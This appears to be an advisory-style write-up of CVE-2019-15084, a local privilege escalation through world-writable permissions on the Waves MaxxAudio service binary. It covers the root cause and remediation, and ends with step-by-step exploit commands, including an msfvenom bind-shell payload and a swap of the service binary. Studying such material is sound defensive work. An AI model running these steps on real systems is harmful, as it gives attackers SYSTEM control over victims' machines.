CVE-2019-15084

A local attacker first verifies the weak permissions on `WavesSysSvc64.exe` using `icacls`, confirming that the `Everyone` group has full control (`F`) [ref_id=1]. Because the service runs as `LocalSystem`, replacing its binary with a malicious executable causes the service to execute the attacker's payload with SYSTEM privileges. The attacker moves the legitimate binary aside (since it is in use) and places a crafted `exe-service` payload (e.g., a bind shell generated with msfvenom) in its place [ref_id=1]. No authentication beyond local user access is required, and no special privileges are needed to exploit the weak file permission.

The vulnerable binary is `C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe`, the executable for the `wavessyssvc` service which runs as `LocalSystem` [ref_id=1]. The service binary is installed with overly permissive ACLs, granting `Everyone:(I)(F)` (full control) to all users [ref_id=1].

No patch is provided in the bundle. The advisory states that "Dell PSIRT has acknowledged the issue and advises updating to a supported driver" [ref_id=1]. The fix would involve the vendor revising the installer to set restrictive file permissions on `WavesSysSvc64.exe`, removing the `Everyone:(F)` ACE so that only `SYSTEM` and `Administrators` can modify the binary, thereby preventing unprivileged users from replacing it.

1. Verify weak permissions: `icacls "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe"` — confirm `Everyone:(I)(F)` is present. 2. Generate a service payload: `msfvenom -p windows/shell_bind_tcp LPORT=4444 -f exe-service -o service.exe`. 3. Transfer the payload to the victim. 4. Move the legitimate binary: `move "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe" "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.bak"`. 5. Copy the malicious payload to the original path: `copy service.exe "C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe"`. 6. Restart the service or reboot; the payload runs as SYSTEM [ref_id=1].